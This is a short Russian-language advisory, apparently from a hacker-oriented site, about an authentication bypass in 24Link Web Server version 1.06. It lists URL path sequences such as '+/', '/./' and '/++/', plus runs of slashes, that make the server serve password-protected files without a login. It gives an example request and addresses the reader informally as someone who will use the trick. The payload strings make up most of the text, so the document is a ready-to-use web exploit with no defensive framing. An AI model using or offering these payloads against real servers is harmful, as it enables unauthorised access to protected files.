Уязвимость в 24Link Web Server позволяет просмотреть любой защищенный паролем файл на сервере.
Системы уязвимы:
24Link version 1.06
Описание:
Добавляя любые из следующих символов к обычному запросу, ты принуждаешь сервер к тому, что тебе "верят" на слово, и требовать пароль с логином поэтому у тебя никто не будет 🙂
+/
/./
/+./
/++/
/++./
Еще можешь юзать комбинации из этих символов, заканчивающиеся слэшами (два или больше / - предел 200)
Пример:
http://www.example.com/++//////protected.html
